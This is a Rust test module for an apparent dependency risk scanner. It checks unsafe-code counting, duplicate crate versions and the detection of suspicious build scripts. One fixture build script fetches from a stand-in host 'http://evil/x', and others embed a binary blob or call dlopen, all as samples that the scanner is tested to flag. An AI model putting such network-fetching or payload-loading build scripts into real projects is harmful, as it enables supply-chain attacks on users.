    // Files are written in reverse name order; the reported sample must still
    // be the alphabetically first one.
    #[test]
    fn evidence_sample_is_walk_order_independent() {
        let dir = scratch_crate(
            "unsafe_det",
            &[
                ("z_last.rs", "pub unsafe fn z() { unsafe {} }"),
                ("a_first.rs", "pub unsafe fn a() { unsafe {} }"),
            ],
        );
        let (stats, sample) = count_unsafe(&dir).expect("unsafe found in the crate");
        assert!(stats.total >= 2, "both files' unsafe should be counted");
        assert!(
            sample.ends_with("a_first.rs"),
            "evidence sample must be the lexicographically-first match, was {sample:?}"
        );
        let _ = std::fs::remove_dir_all(&dir);
    }

    // Entries come back sorted by name regardless of creation order.
    #[test]
    fn sorted_dir_entries_is_lexicographic() {
        let dir = scratch_crate(
            "sorted_entries",
            &[("c.rs", "x"), ("a.rs", "x"), ("b.rs", "x")],
        );
        let names: Vec<String> = sorted_dir_entries(&dir.join("src"))
            .iter()
            .map(|e| e.file_name().to_string_lossy().into_owned())
            .collect();
        assert_eq!(names, vec!["a.rs", "b.rs", "c.rs"]);
        let _ = std::fs::remove_dir_all(&dir);
    }

    // A build script that only prints a link directive yields no signal.
    #[test]
    fn benign_build_script_is_not_suspicious() {
        let src = "fn main() {\n println!(\"cargo:rustc-link-lib=ssl\");\n}\n";
        assert!(build_script_intent_signal("openssl-sys@0.9.99", src, "build.rs".into()).is_none());
    }

    // Network access inside a build script is reported at High.
    #[test]
    fn network_build_script_is_high() {
        let src = "fn main(){ let _ = reqwest::blocking::get(\"http://evil/x\"); }";
        let sig = build_script_intent_signal("evil@1.0.0", src, "build.rs".into()).unwrap();
        assert_eq!(sig.id, "build_script_suspicious");
        assert_eq!(sig.severity, Severity::High);
        assert!(sig
            .evidence
            .iter()
            .any(|e| e.summary.contains("network access")));
    }

    // Embedding a binary blob via `include_bytes!` is reported at Medium.
    #[test]
    fn payload_build_script_is_medium() {
        let src = "fn main(){ let p = include_bytes!(\"blob.bin\"); let _ = p; }";
        let sig = build_script_intent_signal("sneaky@1.0.0", src, "build.rs".into()).unwrap();
        assert_eq!(sig.severity, Severity::Medium);
        assert!(sig.evidence.iter().any(|e| e.summary.contains("payload")));
    }

    // `dlopen` appearing only inside env-var / feature names is ignored, while
    // an actual `libc::dlopen` call is reported.
    #[test]
    fn dlopen_in_a_feature_name_is_not_a_payload() {
        let benign = "fn main(){\n println!(\"cargo:rerun-if-env-changed=RUST_FONTCONFIG_DLOPEN\");\n \
 if std::env::var(\"RUST_FONTCONFIG_DLOPEN\").is_ok() {\n \
 println!(\"cargo:rustc-cfg=feature=\\\"source-fontconfig-dlopen\\\"\");\n }\n}\n";
        assert!(
            build_script_intent_signal("font-kit@1.0.0", benign, "build.rs".into()).is_none(),
            "a `*-dlopen` feature/env name must not be read as dynamic loading"
        );
        let real = "fn main(){ unsafe { let _ = libc::dlopen(p, 1); } }";
        assert!(build_script_intent_signal("x@1.0.0", real, "build.rs".into()).is_some());
    }

    // Two locked versions of one crate yield one signal per version.
    #[test]
    fn detects_multiple_versions() {
        let model = lock(vec![pkg("foo", "1.0.0", false), pkg("foo", "2.0.0", false)]);
        let mut signals = vec![];
        collect_multiple_versions(&model, &mut signals);
        assert_eq!(
            signals
                .iter()
                .filter(|s| s.id == "multiple_versions_same_crate")
                .count(),
            2
        );
    }

    // Only the standalone keyword in code counts; identifiers containing it
    // and comment text do not.
    #[test]
    fn unsafe_scan_counts_only_real_code() {
        assert_eq!(scan_unsafe("unsafe { *p }").total, 1);
        assert_eq!(scan_unsafe("no danger here").total, 0);
        assert_eq!(scan_unsafe("let unsafely = 1; // unsafe").total, 0);
    }

    // Line comments, nested block comments, strings and raw strings are all
    // skipped; only the real block is counted.
    #[test]
    fn unsafe_scan_ignores_comments_and_strings() {
        let src = r##"
 // unsafe in a line comment
 /* unsafe in a block /* nested unsafe */ comment */
 let s = "this unsafe is a string";
 let r = r#"raw unsafe"#;
 fn real() { unsafe { } }
 "##;
        let st = scan_unsafe(src);
        assert_eq!(st.total, 1, "only the real unsafe block counts, got {st:?}");
        assert_eq!(st.blocks, 1);
    }

    // One occurrence of each category, plus the rendered breakdown string.
    #[test]
    fn unsafe_scan_categorizes() {
        let src = "unsafe fn a(){} unsafe impl T for U {} unsafe trait W {} fn b(){ unsafe { } }";
        let st = scan_unsafe(src);
        assert_eq!(st.total, 4);
        assert_eq!(st.fns, 1);
        assert_eq!(st.impls, 1);
        assert_eq!(st.traits, 1);
        assert_eq!(st.blocks, 1);
        assert_eq!(st.breakdown(), "4 (1 fn, 1 impl, 1 trait, 1 block)");
    }

    // A `'"'` char literal must not be mistaken for the start of a string.
    #[test]
    fn unsafe_scan_handles_char_literal_with_quote() {
        let src = "let q = '\"'; unsafe { }";
        assert_eq!(scan_unsafe(src).total, 1);
    }

    // After sorting, the higher-severity signal comes first.
    #[test]
    fn sort_is_severity_descending() {
        let mut signals = vec![
            RiskSignal {
                id: "a".into(),
                package: "p".into(),
                severity: Severity::Low,
                weight: 1,
                confidence: 1.0,
                evidence: vec![],
                recommendation: String::new(),
            },
            RiskSignal {
                id: "b".into(),
                package: "p".into(),
                severity: Severity::High,
                weight: 1,
                confidence: 1.0,
                evidence: vec![],
                recommendation: String::new(),
            },
        ];
        sort_signals(&mut signals);
        assert_eq!(signals[0].severity, Severity::High);
    }
}